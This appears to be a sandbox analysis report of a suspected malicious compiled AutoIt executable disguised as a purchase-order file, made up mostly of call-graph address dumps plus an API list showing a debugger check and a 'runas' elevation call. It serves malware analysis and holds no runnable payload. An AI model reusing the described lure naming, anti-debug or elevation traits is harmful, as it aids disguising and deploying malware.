104154->104295 104157 2df7fc 104155->104157 104158 2df7f1 104155->104158 104291 2d889e 47 API calls __getptd_noexit 104157->104291 104274 2df84c 104158->104274 104161 2df7f7 104292 2df823 LeaveCriticalSection __unlock_fhandle 104161->104292 104162 2df7a3 __mtinitlocknum 104162->104119 104164->104109 104165->104113 104167 2dbd20 __mtinitlocknum 
104166->104167 104168 2dbd28 104167->104168 104169 2dbd40 104167->104169 104264 2d886a 47 API calls __getptd_noexit 104168->104264 104170 2dbdd5 104169->104170 104175 2dbd72 104169->104175 104269 2d886a 47 API calls __getptd_noexit 104170->104269 104172 2dbd2d 104265 2d889e 47 API calls __getptd_noexit 104172->104265 104191 2db6a0 104175->104191 104176 2dbdda 104270 2d889e 47 API calls __getptd_noexit 104176->104270 104179 2dbd78 104181 2dbd9e 104179->104181 104182 2dbd8b 104179->104182 104180 2dbde2 104271 2d7aa0 8 API calls ___strgtold12_l 104180->104271 104266 2d889e 47 API calls __getptd_noexit 104181->104266 104200 2dbdf6 104182->104200 104184 2dbd35 __mtinitlocknum 104184->104129 104187 2dbd97 104268 2dbdcd LeaveCriticalSection __unlock_fhandle 104187->104268 104188 2dbda3 104267 2d886a 47 API calls __getptd_noexit 104188->104267 104192 2db6ac __mtinitlocknum 104191->104192 104193 2db6f9 EnterCriticalSection 104192->104193 104195 2d8984 __lock 47 API calls 104192->104195 104194 2db71f __mtinitlocknum 104193->104194 104194->104179 104196 2db6d0 104195->104196 104197 2db6ed 104196->104197 104198 2db6db InitializeCriticalSectionAndSpinCount 104196->104198 104199 2db723 ___lock_fhandle LeaveCriticalSection 104197->104199 104198->104197 104199->104193 104201 2dbe03 __ftell_nolock 104200->104201 104202 2dbe5f 104201->104202 104203 2dbe40 104201->104203 104247 2dbe35 104201->104247 104206 2dbeb8 104202->104206 104207 2dbe9c 104202->104207 104205 2d886a __lseeki64 47 API calls 104203->104205 104204 2db4bf ___strgtold12_l 6 API calls 104208 2dc61e 104204->104208 104209 2dbe45 104205->104209 104211 2dbecf 104206->104211 104215 2e05df __lseeki64_nolock 49 API calls 104206->104215 104210 2d886a __lseeki64 47 API calls 104207->104210 104208->104187 104212 2d889e ___strgtold12_l 47 API calls 104209->104212 104214 2dbea1 104210->104214 104213 2e49a2 __flswbuf 47 API calls 104211->104213 104216 2dbe4c 104212->104216 104217 2dbedd 104213->104217 104218 2d889e ___strgtold12_l 
47 API calls 104214->104218 104215->104211 104219 2d7aa0 ___strgtold12_l 8 API calls 104216->104219 104220 2dc1fe 104217->104220 104225 2d869d ____lc_codepage_func 47 API calls 104217->104225 104221 2dbea8 104218->104221 104219->104247 104222 2dc56b WriteFile 104220->104222 104223 2dc216 104220->104223 104224 2d7aa0 ___strgtold12_l 8 API calls 104221->104224 104228 2dc1c3 104222->104228 104229 2dc594 GetLastError 104222->104229 104226 2dc30d 104223->104226 104227 2dc22c 104223->104227 104224->104247 104232 2dbf03 GetConsoleMode 104225->104232 104230 2dc318 104226->104230 104231 2dc416 104226->104231 104233 2dc5ce 104227->104233 104237 2dc29c WriteFile 104227->104237 104228->104233 104239 2dc5aa 104228->104239 104228->104247 104229->104228 104230->104233 104245 2dc391 WriteFile 104230->104245 104231->104233 104241 2dc48b WideCharToMultiByte 104231->104241 104232->104220 104236 2dbf3c 104232->104236 104234 2d889e ___strgtold12_l 47 API calls 104233->104234 104233->104247 104238 2dc5f6 104234->104238 104235 2dbf4c GetConsoleCP 104235->104228 104260 2dbf75 104235->104260 104236->104220 104236->104235 104237->104229 104240 2dc2d9 104237->104240 104242 2d886a __lseeki64 47 API calls 104238->104242 104243 2dc5c5 104239->104243 104244 2dc5b1 104239->104244 104240->104227 104240->104228 104246 2dc308 104240->104246 104241->104229 104256 2dc4d2 104241->104256 104242->104247 104249 2d887d __dosmaperr 47 API calls 104243->104249 104248 2d889e ___strgtold12_l 47 API calls 104244->104248 104245->104229 104250 2dc3e0 104245->104250 104246->104228 104247->104204 104252 2dc5b6 104248->104252 104249->104247 104250->104228 104250->104230 104250->104246 104251 2dc4da WriteFile 104253 2dc52d GetLastError 104251->104253 104251->104256 104254 2d886a __lseeki64 47 API calls 104252->104254 104253->104256 104254->104247 104255 2d22a8 __chsize_nolock 57 API calls 104255->104260 104256->104228 104256->104231 104256->104246 104256->104251 104257 2e4ea7 59 API calls __chsize_nolock 
104257->104260 104258 2e6634 WriteConsoleW CreateFileW __chsize_nolock 104261 2dc0a9 104258->104261 104259 2dc042 WideCharToMultiByte 104259->104228 104262 2dc07d WriteFile 104259->104262 104260->104228 104260->104255 104260->104257 104260->104259 104260->104261 104261->104228 104261->104229 104261->104258 104261->104260 104263 2dc0d4 WriteFile 104261->104263 104262->104229 104262->104261 104263->104229 104263->104261 104264->104172 104265->104184 104266->104188 104267->104187 104268->104184 104269->104176 104270->104180 104271->104184 104272->104138 104273->104140 104296 2db957 104274->104296 104276 2df8b0 104309 2db8d1 48 API calls 2 library calls 104276->104309 104278 2df85a 104278->104276 104279 2df88e 104278->104279 104280 2db957 __close_nolock 47 API calls 104278->104280 104279->104276 104281 2db957 __close_nolock 47 API calls 104279->104281 104283 2df885 104280->104283 104284 2df89a CloseHandle 104281->104284 104282 2df8b8 104285 2df8da 104282->104285 104310 2d887d 47 API calls 3 library calls 104282->104310 104286 2db957 __close_nolock 47 API calls 104283->104286 104284->104276 104287 2df8a6 GetLastError 104284->104287 104285->104161 104286->104279 104287->104276 104289->104147 104290->104162 104291->104161 104292->104162 104293->104149 104294->104154 104295->104162 104297 2db977 104296->104297 104298 2db962 104296->104298 104300 2d886a __lseeki64 47 API calls 104297->104300 104302 2db99c 104297->104302 104299 2d886a __lseeki64 47 API calls 104298->104299 104301 2db967 104299->104301 104303 2db9a6 104300->104303 104304 2d889e ___strgtold12_l 47 API calls 104301->104304 104302->104278 104306 2d889e ___strgtold12_l 47 API calls 104303->104306 104305 2db96f 104304->104305 104305->104278 104307 2db9ae 104306->104307 104308 2d7aa0 ___strgtold12_l 8 API calls 104307->104308 104308->104305 104309->104282 104310->104285 104311->103737 104312->103743 104313->103740 104314->103750 104315->103757 104316->103759 104317->103756 104318->103764 104319->103769 
104320->103784 104321->103782 104323 324aa5 GetFullPathNameW 104322->104323 104324 2b31c7 104322->104324 104326 324abd 104323->104326 104379 2b3bcf 104324->104379 104327 2b31cd GetFullPathNameW 104328 2b31e7 104327->104328 104328->103605 104330 2b3a8b SHGetDesktopFolder 104329->104330 104333 2b3ade 104329->104333 104331 2b3a99 104330->104331 104330->104333 104332 2b3ac8 SHGetPathFromIDListW 104331->104332 104331->104333 104332->104333 104333->103608 104335 2b3ba9 104334->104335 104336 2b3b72 104334->104336 104335->104336 104337 2d1bc7 _W_store_winword 59 API calls 104335->104337 104340 3233e5 104335->104340 104338 2b3bcf 48 API calls 104336->104338 104337->104335 104339 2b3b7d 104338->104339 104383 2b197e 104339->104383 104343 2b197e 48 API calls 104344 2b3b9f 104343->104344 104345 2b3dcb 104344->104345 104346 2b3f9b 136 API calls 104345->104346 104347 2b3def 104346->104347 104348 3239f9 104347->104348 104350 2b3f9b 136 API calls 104347->104350 104349 2fcc82 122 API calls 104348->104349 104351 323a0e 104349->104351 104352 2b3e02 104350->104352 104354 323a12 104351->104354 104355 323a2f 104351->104355 104352->104348 104353 2b3e0a 104352->104353 104356 323a1a 104353->104356 104357 2b3e16 104353->104357 104358 2b3e39 84 API calls 104354->104358 104359 2d010a 48 API calls 104355->104359 104402 2f757b 87 API calls _wprintf 104356->104402 104401 2bbdf0 163 API calls 8 library calls 104357->104401 104358->104356 104362 323a74 Mailbox 104359->104362 104365 323c24 104362->104365 104369 323c35 104362->104369 104376 2bcaee 48 API calls 104362->104376 104389 2f30ac 104362->104389 104392 2bb6d0 104362->104392 104403 2f2fcd 60 API calls 2 library calls 104362->104403 104404 2fa525 48 API calls 104362->104404 104405 2ba870 48 API calls 104362->104405 104363 2b3e2e 104363->103606 104364 323a28 104364->104355 104366 2d28ca _free 47 API calls 104365->104366 104367 323c2c 104366->104367 104368 2b3e39 84 API calls 104367->104368 104368->104369 104373 2d28ca _free 47 API calls 
104369->104373 104374 2b3e39 84 API calls 104369->104374 104406 2f32b0 86 API calls 4 library calls 104369->104406 104373->104369 104374->104369 104376->104362 104380 2b3bd9 __wsetenvp 104379->104380 104381 2d010a 48 API calls 104380->104381 104382 2b3bee _wcscpy 104381->104382 104382->104327 104384 2b1990 104383->104384 104388 2b19af _memmove 104383->104388 104387 2d010a 48 API calls 104384->104387 104385 2d010a 48 API calls 104386 2b19c6 104385->104386 104386->104343 104387->104388 104388->104385 104390 2d010a 48 API calls 104389->104390 104391 2f30dc _memmove 104390->104391 104391->104362 104391->104391 104393 2bb789 104392->104393 104400 2bb6e3 _memmove 104392->104400 104395 2d010a 48 API calls 104393->104395 104394 2d010a 48 API calls 104396 2bb6ea 104394->104396 104395->104400 104397 2bb71b 104396->104397 104398 2d010a 48 API calls 104396->104398 104397->104362 104399 2bb74d 104398->104399 104399->104362 104400->104394 104401->104363 104402->104364 104403->104362 104404->104362 104405->104362 104406->104369 104408 2ba72c 104407->104408 104413 2ba848 104407->104413 104409 2d010a 48 API calls 104408->104409 104408->104413 104410 2ba753 104409->104410 104411 2d010a 48 API calls 104410->104411 104412 2ba7c5 104411->104412 104412->104413 104417 2bb6d0 48 API calls 104412->104417 104420 2bace0 91 API calls 2 library calls 104412->104420 104421 2ba870 48 API calls 104412->104421 104422 2fa3ee 48 API calls 104412->104422 104413->103614 104417->104412 104418->103617 104419->103619 104420->104412 104421->104412 104422->104412 104424 2b31a2 LoadImageW 104423->104424 104425 324ad8 EnumResourceNamesW 104423->104425 104426 2b3118 RegisterClassExW 104424->104426 104425->104426 104427 2b2f58 GetSysColorBrush RegisterClassExW RegisterWindowMessageW 104426->104427 104428 2b2fe9 ImageList_Create LoadIconW ImageList_ReplaceIcon 104427->104428 104428->103633 104430 2bea20 104429->104430 104431 2bfa40 346 API calls 104430->104431 104435 2bea89 104430->104435 104433 329919 
104431->104433 104432 3299bc 104556 2fd520 86 API calls 4 library calls 104432->104556 104433->104435 104553 2fd520 86 API calls 4 library calls 104433->104553 104437 2beb18 104435->104437 104440 2bd3d2 48 API calls 104435->104440 104451 2becd7 Mailbox 104435->104451 104436 2bfa40 346 API calls 104436->104451 104439 2bd3d2 48 API calls 104437->104439 104437->104451 104441 329997 104439->104441 104442 329963 104440->104442 104555 2d1b2a 52 API calls __cinit 104441->104555 104554 2d1b2a 52 API calls __cinit 104442->104554 104445 2bd380 55 API calls 104445->104451 104447 2bef0c Mailbox 104447->103657 104448 329d70 104565 30e2fb 346 API calls Mailbox 104448->104565 104449 2b342c 48 API calls 104449->104451 104450 329e49 104570 2fd520 86 API calls 4 library calls 104450->104570 104451->104432 104451->104436 104451->104445 104451->104447 104451->104448 104451->104449 104451->104450 104452 329dc2 104451->104452 104453 329ddf 104451->104453 104460 2c14a0 48 API calls 104451->104460 104463 2bf56f 104451->104463 104466 2fd520 86 API calls 104451->104466 104467 329a3c 104451->104467 104552 2bd805 48 API calls _memmove 104451->104552 104557 2fa3ee 48 API calls 104451->104557 104558 30ede9 346 API calls 104451->104558 104563 2ea599 InterlockedDecrement 104451->104563 104564 30f4df 346 API calls 104451->104564 104567 2fd520 86 API calls 4 library calls 104452->104567 104568 30c235 346 API calls Mailbox 104453->104568 104460->104451 104461 329df7 104461->104447 104569 2fd520 86 API calls 4 library calls 104461->104569 104463->104447 104566 2fd520 86 API calls 4 library calls 104463->104566 104466->104451 104559 30d154 48 API calls 104467->104559 104469 329a48 104471 329a56 104469->104471 104472 329a9b 104469->104472 104560 2fa485 48 API calls 104471->104560 104475 329a91 Mailbox 104472->104475 104561 2fafce 48 API calls 104472->104561 104473 2bfa40 346 API calls 104473->104447 104475->104473 104477 329ad8 104562 2cdf08 48 API calls 104477->104562 104480 2c469f 104479->104480 
104481 2c4537 104479->104481 104484 2bcaee 48 API calls 104480->104484 104482 327820 104481->104482 104483 2c4543 104481->104483 104619 30e713 346 API calls Mailbox 104482->104619 104618 2c4040 346 API calls _memmove 104483->104618 104491 2c45e4 Mailbox 104484->104491 104487 32782c 104488 2c4639 Mailbox 104487->104488 104620 2fd520 86 API calls 4 library calls 104487->104620 104488->103657 104490 2c4559 104490->104487 104490->104488 104490->104491 104492 2b3e39 84 API calls 104491->104492 104571 3001e4 104491->104571 104612 2cdd84 104491->104612 104615 310c0e 104491->104615 104492->104488 104496->103657 104497->103657 104498->103657 104499->103657 104500->103657 104501->103639 104502->103642 104503->103647 104504->103657 104505->103657 104506->103657 104507->103660 104508->103660 104509->103660 104511 2bfa60 104510->104511 104536 2bfa8e Mailbox _memmove 104510->104536 104513 2d010a 48 API calls 104511->104513 104512 2d1b2a 52 API calls __cinit 104512->104536 104513->104536 104514 2c105e 104852 2bc935 48 API calls 104514->104852 104516 2bd3d2 48 API calls 104516->104536 104519 2c0119 104857 2fd520 86 API calls 4 library calls 104519->104857 104520 2c1063 104856 2fd520 86 API calls 4 library calls 104520->104856 104521 2c0dee 104846 2bd89e 50 API calls Mailbox 104521->104846 104523 2c0dfa 104847 2bd89e 50 API calls Mailbox 104523->104847 104525 32b772 104858 2fd520 86 API calls 4 library calls 104525->104858 104526 2bc935 48 API calls 104526->104536 104530 2c0e83 104533 2bcaee 48 API calls 104530->104533 104532 32b7d2 104534 2c10f1 Mailbox 104533->104534 104854 2fd520 86 API calls 4 library calls 104534->104854 104535 2bfbf1 Mailbox 104535->103657 104536->104512 104536->104514 104536->104516 104536->104519 104536->104520 104536->104521 104536->104523 104536->104525 104536->104526 104536->104530 104536->104534 104536->104535 104539 2c1230 104536->104539 104541 2d010a 48 API calls 104536->104541 104542 2bfa40 346 API calls 104536->104542 104545 2ea599 
InterlockedDecrement 104536->104545 104546 32b583 104536->104546 104841 310bfa 104536->104841 104844 2bf6d0 346 API calls 2 library calls 104536->104844 104845 2c1620 59 API calls Mailbox 104536->104845 104848 30ee52 82 API calls 2 library calls 104536->104848 104849 30ef9d 90 API calls Mailbox 104536->104849 104850 2fb020 48 API calls 104536->104850 104851 30e713 346 API calls Mailbox 104536->104851 104539->104535 104855 2fd520 86 API calls 4 library calls 104539->104855 104541->104536 104542->104536 104545->104536 104853 2fd520 86 API calls 4 library calls 104546->104853 104549->103660 104550->103660 104551->103660 104552->104451 104553->104435 104554->104437 104555->104451 104556->104447 104557->104451 104558->104451 104559->104469 104560->104475 104561->104477 104562->104475 104563->104451 104564->104451 104565->104463 104566->104447 104567->104447 104568->104461 104569->104447 104570->104447 104572 300218 104571->104572 104573 30020d 104571->104573 104575 2b84a6 81 API calls 104572->104575 104685 2bcdb4 48 API calls 104573->104685 104577 300232 104575->104577 104576 300366 104576->104488 104577->104576 104578 300254 104577->104578 104579 30033c 104577->104579 104580 2b84a6 81 API calls 104578->104580 104581 2b3f9b 136 API calls 104579->104581 104586 300260 _wcscpy _wcschr 104580->104586 104582 30034d 104581->104582 104583 300362 104582->104583 104584 2b3f9b 136 API calls 104582->104584 104583->104576 104585 2b84a6 81 API calls 104583->104585 104584->104583 104587 30039b 104585->104587 104591 300284 _wcscat _wcscpy 104586->104591 104595 3002b2 _wcscat 104586->104595 104621 2d297d 104587->104621 104589 2b84a6 81 API calls 104590 3002d0 _wcscpy 104589->104590 104686 2f7c0c GetFileAttributesW 104590->104686 104593 2b84a6 81 API calls 104591->104593 104593->104595 104594 3002f0 __wsetenvp 104594->104576 104597 2b84a6 81 API calls 104594->104597 104595->104589 104596 3003bf _wcscat _wcscpy 104600 2b84a6 81 API calls 104596->104600 104598 30031c 104597->104598 104687 
2f6b3f 77 API calls 4 library calls 104598->104687 104602 300456 104600->104602 104601 300330 104601->104576 104624 2f7334 104602->104624 104604 300476 104605 2cdd84 3 API calls 104604->104605 104606 300485 104605->104606 104607 2b84a6 81 API calls 104606->104607 104610 3004b6 104606->104610 104608 30049f 104607->104608 104630 2fc890 104608->104630 104611 2b3e39 84 API calls 104610->104611 104611->104576 104750 2cdd92 GetFileAttributesW 104612->104750 104755 30f79f 104615->104755 104617 310c1e 104617->104488 104618->104490 104619->104487 104620->104488 104688 2d29c7 104621->104688 104625 2f7341 _wcschr __ftell_nolock 104624->104625 104626 2d297d __wsplitpath 47 API calls 104625->104626 104629 2f7357 _wcscat _wcscpy 104625->104629 104627 2f7389 104626->104627 104628 2d297d __wsplitpath 47 API calls 104627->104628 104628->104629 104629->104604 104631 2fc89d __ftell_nolock 104630->104631 104632 2d010a 48 API calls 104631->104632 104633 2fc8fa 104632->104633 104634 2b4bce 48 API calls 104633->104634 104635 2fc904 104634->104635 104636 2fc6a0 GetSystemTimeAsFileTime 104635->104636 104637 2fc90f 104636->104637 104638 2b41a7 83 API calls 104637->104638 104639 2fc922 _wcscmp 104638->104639 104640 2fc946 104639->104640 104641 2fc9f3 104639->104641 104642 2fce59 94 API calls 104640->104642 104643 2fce59 94 API calls 104641->104643 104644 2fc94b 104642->104644 104658 2fc9bf _wcscat 104643->104658 104645 2d297d __wsplitpath 47 API calls 104644->104645 104647 2fc9fc 104644->104647 104650 2fc974 _wcscat _wcscpy 104645->104650 104646 2b417d 64 API calls 104648 2fca18 104646->104648 104647->104610 104649 2b417d 64 API calls 104648->104649 104651 2fca28 104649->104651 104653 2d297d __wsplitpath 47 API calls 104650->104653 104652 2b417d 64 API calls 104651->104652 104654 2fca43 104652->104654 104653->104658 104655 2b417d 64 API calls 104654->104655 104656 2fca53 104655->104656 104657 2b417d 64 API calls 104656->104657 104659 2fca6e 104657->104659 104658->104646 104658->104647 104660 
2b417d 64 API calls 104659->104660 104661 2fca7e 104660->104661 104662 2b417d 64 API calls 104661->104662 104663 2fca8e 104662->104663 104664 2b417d 64 API calls 104663->104664 104665 2fca9e 104664->104665 104714 2fd009 GetTempPathW GetTempFileNameW 104665->104714 104667 2fcaaa 104668 2d4129 117 API calls 104667->104668 104679 2fcabb 104668->104679 104669 2fcb75 104670 2d4274 __fcloseall 83 API calls 104669->104670 104671 2fcb80 104670->104671 104673 2fcb9a 104671->104673 104674 2fcb86 DeleteFileW 104671->104674 104672 2b417d 64 API calls 104672->104679 104675 2fcc2e CopyFileW 104673->104675 104680 2fcba4 104673->104680 104674->104647 104676 2fcc56 DeleteFileW 104675->104676 104677 2fcc44 DeleteFileW 104675->104677 104728 2fcfc8 CreateFileW 104676->104728 104677->104647 104679->104647 104679->104669 104679->104672 104715 2d373e 104679->104715 104731 2fc251 118 API calls __fcloseall 104680->104731 104683 2fcc19 104683->104676 104684 2fcc1d DeleteFileW 104683->104684 104684->104647 104685->104572 104686->104594 104687->104601 104689 2d29e2 104688->104689 104692 2d29d6 104688->104692 104712 2d889e 47 API calls __getptd_noexit 104689->104712 104691 2d2b9a 104693 2d29c2 104691->104693 104713 2d7aa0 8 API calls ___strgtold12_l 104691->104713 104692->104689 104701 2d2a55 104692->104701 104707 2da9fb 47 API calls ___strgtold12_l 104692->104707 104693->104596 104696 2d2ac2 104697 2d2b21 104696->104697 104698 2d2ae0 104696->104698 104697->104689 104697->104693 104699 2d2b31 104697->104699 104698->104689 104700 2d2afc 104698->104700 104709 2da9fb 47 API calls ___strgtold12_l 104698->104709 104711 2da9fb 47 API calls ___strgtold12_l 104699->104711 104700->104689 104700->104693 104703 2d2b12 104700->104703 104701->104689 104701->104696 104708 2da9fb 47 API calls ___strgtold12_l 104701->104708 104710 2da9fb 47 API calls ___strgtold12_l 104703->104710 104707->104701 104708->104696 104709->104700 104710->104693 104711->104693 104712->104691 104713->104693 104714->104667 104716 
2d374a __mtinitlocknum 104715->104716 104717 2d377c 104716->104717 104718 2d3764 104716->104718 104719 2d3774 __mtinitlocknum 104716->104719 104720 2d5a9f __lock_file 48 API calls 104717->104720 104744 2d889e 47 API calls __getptd_noexit 104718->104744 104719->104679 104723 2d3782 104720->104723 104722 2d3769 104745 2d7aa0 8 API calls ___strgtold12_l 104722->104745 104732 2d35e7 104723->104732 104729 2fcfee SetFileTime CloseHandle 104728->104729 104730 2fd004 104728->104730 104729->104730 104730->104647 104731->104683 104733 2d35f6 104732->104733 104738 2d3614 104732->104738 104734 2d3604 104733->104734 104733->104738 104743 2d362c _memmove 104733->104743 104747 2d889e 47 API calls __getptd_noexit 104734->104747 104736 2d3609 104748 2d7aa0 8 API calls ___strgtold12_l 104736->104748 104746 2d37b4 LeaveCriticalSection LeaveCriticalSection __wfsopen 104738->104746 104740 2d3914 __flush 78 API calls 104740->104743 104741 2d35c3 __flush 47 API calls 104741->104743 104742 2dbd14 __flush 78 API calls 104742->104743 104743->104738 104743->104740 104743->104741 104743->104742 104749 2d9af3 78 API calls 6 library calls 104743->104749 104744->104722 104745->104719 104746->104719 104747->104736 104748->104738 104749->104743 104751 2cdd89 104750->104751 104752 324a7d FindFirstFileW 104750->104752 104751->104488 104753 324a95 FindClose 104752->104753 104754 324a8e 104752->104754 104754->104753 104756 2b84a6 81 API calls 104755->104756 104757 30f7db 104756->104757 104758 30f81d Mailbox 104757->104758 104791 310458 104757->104791 104758->104617 104760 30fa7c 104761 30fbeb 104760->104761 104766 30fa86 104760->104766 104827 310579 89 API calls Mailbox 104761->104827 104764 30fbf8 104765 30fc04 104764->104765 104764->104766 104765->104758 104804 30f5fb 104766->104804 104767 2b84a6 81 API calls 104785 30f875 Mailbox 104767->104785 104772 30faba 104818 2cf92c 104772->104818 104775 30fad4 104824 2fd520 86 API calls 4 library calls 104775->104824 104776 30faee 104778 2b3320 48 API calls 
104776->104778 104780 30fb05 104778->104780 104779 30fadf GetCurrentProcess TerminateProcess 104779->104776 104781 2c14a0 48 API calls 104780->104781 104790 30fb2f 104780->104790 104783 30fb1e 104781->104783 104782 30fc56 104782->104758 104787 30fc6f FreeLibrary 104782->104787 104825 310300 105 API calls _free 104783->104825 104784 2c14a0 48 API calls 104784->104790 104785->104758 104785->104760 104785->104767 104785->104785 104822 3128d9 48 API calls _memmove 104785->104822 104823 30fc96 60 API calls 2 library calls 104785->104823 104787->104758 104790->104782 104790->104784 104826 2bd89e 50 API calls Mailbox 104790->104826 104828 310300 105 API calls _free 104790->104828 104792 2bb8a7 48 API calls 104791->104792 104793 310473 CharLowerBuffW 104792->104793 104829 30267a 104793->104829 104797 2bd3d2 48 API calls 104798 3104ac 104797->104798 104836 2b7f40 48 API calls _memmove 104798->104836 104800 3104c3 104801 2ba2fb 48 API calls 104800->104801 104802 3104cf Mailbox 104801->104802 104803 31050b Mailbox 104802->104803 104837 30fc96 60 API calls 2 library calls 104802->104837 104803->104785 104805 30f616 104804->104805 104809 30f66b 104804->104809 104806 2d010a 48 API calls 104805->104806 104807 30f638 104806->104807 104808 2d010a 48 API calls 104807->104808 104807->104809 104808->104807 104810 310719 104809->104810 104811 310944 Mailbox 104810->104811 104814 31073c _strcat _wcscpy __wsetenvp 104810->104814 104811->104772 104812 2bd00b 58 API calls 104812->104814 104813 2bcdb4 48 API calls 104813->104814 104814->104811 104814->104812 104814->104813 104815 2b84a6 81 API calls 104814->104815 104816 2d45ec 47 API calls __crtCompareStringA_stat 104814->104816 104840 2f8932 50 API calls __wsetenvp 104814->104840 104815->104814 104816->104814 104819 2cf941 104818->104819 104820 2cf9d9 VirtualAlloc 104819->104820 104821 2cf9a7 104819->104821 104820->104821 104821->104775 104821->104776 104822->104785 104823->104785 104824->104779 104825->104790 104826->104790 
104827->104764 104828->104790 104830 3026a4 __wsetenvp 104829->104830 104831 3026e2 104830->104831 104833 3026d8 104830->104833 104834 302763 104830->104834 104831->104797 104831->104802 104833->104831 104838 2cdfd2 60 API calls 104833->104838 104834->104831 104839 2cdfd2 60 API calls 104834->104839 104836->104800 104837->104803 104838->104833 104839->104834 104840->104814 104842 30f79f 129 API calls 104841->104842 104843 310c0a 104842->104843 104843->104536 104844->104536 104845->104536 104846->104523 104847->104530 104848->104536 104849->104536 104850->104536 104851->104536 104852->104535 104853->104534 104854->104535 104855->104520 104856->104519 104857->104525 104858->104532 104859 2fc450 104860 2fc45d 104859->104860 104861 2fc463 104859->104861 104862 2d28ca _free 47 API calls 104860->104862 104863 2d28ca _free 47 API calls 104861->104863 104865 2fc474 104861->104865 104862->104861 104863->104865 104864 2fc486 104865->104864 104866 2d28ca _free 47 API calls 104865->104866 104866->104864 104867 321eed 104872 2ce975 104867->104872 104869 321f01 104888 2d1b2a 52 API calls __cinit 104869->104888 104871 321f0b 104873 2d010a 48 API calls 104872->104873 104874 2cea27 GetModuleFileNameW 104873->104874 104875 2d297d __wsplitpath 47 API calls 104874->104875 104876 2cea5b _wcsncat 104875->104876 104889 2d2bff 104876->104889 104879 2d010a 48 API calls 104880 2cea94 _wcscpy 104879->104880 104881 2bd3d2 48 API calls 104880->104881 104882 2ceacf 104881->104882 104892 2ceb05 104882->104892 104884 2ceae0 Mailbox 104884->104869 104885 2ceada _wcscat __wsetenvp _wcsncpy 104885->104884 104886 2d010a 48 API calls 104885->104886 104887 2ba4f6 48 API calls 104885->104887 104886->104885 104887->104885 104888->104871 104906 2daab9 104889->104906 104918 2bc4cd 104892->104918 104894 2ceb14 RegOpenKeyExW 104895 324b17 RegQueryValueExW 104894->104895 104896 2ceb35 104894->104896 104897 324b30 104895->104897 104898 324b91 RegCloseKey 104895->104898 104896->104885 104899 2d010a 48 API calls 
104897->104899 104900 324b49 104899->104900 104901 2b4bce 48 API calls 104900->104901 104902 324b53 RegQueryValueExW 104901->104902 104903 324b6f 104902->104903 104905 324b86 104902->104905 104904 2b7e53 48 API calls 104903->104904 104904->104905 104905->104898 104907 2daaca 104906->104907 104908 2dabc6 104906->104908 104907->104908 104913 2daad5 104907->104913 104916 2d889e 47 API calls __getptd_noexit 104908->104916 104912 2dabbb 104917 2d7aa0 8 API calls ___strgtold12_l 104912->104917 104914 2cea8a 104913->104914 104915 2d889e 47 API calls __getptd_noexit 104913->104915 104914->104879 104915->104912 104916->104912 104917->104914 104919 2bc4da 104918->104919 104920 2bc4e7 104918->104920 104919->104894 104921 2d010a 48 API calls 104920->104921 104921->104919

                        Control-flow Graph

                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 002B376D
                          • Part of subcall function 002B4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,00000000,00000001,00000000), ref: 002B428C
                        • IsDebuggerPresent.KERNEL32(?,?), ref: 002B377F
                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,00371120,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00371124,?,?), ref: 002B37EE
                          • Part of subcall function 002B34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 002B352A
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002B3860
                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00362934,00000010), ref: 003221C5
                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 003221FD
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00322232
                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0034DAA4), ref: 00322290
                        • ShellExecuteW.SHELL32(00000000), ref: 00322297
                          • Part of subcall function 002B30A5: GetSysColorBrush.USER32(0000000F), ref: 002B30B0
                          • Part of subcall function 002B30A5: LoadCursorW.USER32(00000000,00007F00), ref: 002B30BF
                          • Part of subcall function 002B30A5: LoadIconW.USER32(00000063), ref: 002B30D5
                          • Part of subcall function 002B30A5: LoadIconW.USER32(000000A4), ref: 002B30E7
                          • Part of subcall function 002B30A5: LoadIconW.USER32(000000A2), ref: 002B30F9
                          • Part of subcall function 002B30A5: RegisterClassExW.USER32(?), ref: 002B3167
                          • Part of subcall function 002B2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002B2ECB
                          • Part of subcall function 002B2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002B2EEC
                          • Part of subcall function 002B2E9D: ShowWindow.USER32(00000000), ref: 002B2F00
                          • Part of subcall function 002B2E9D: ShowWindow.USER32(00000000), ref: 002B2F09
                          • Part of subcall function 002B3598: _memset.LIBCMT ref: 002B35BE
                          • Part of subcall function 002B3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002B3667
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                        • String ID: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"7
                        • API String ID: 4253510256-848070753
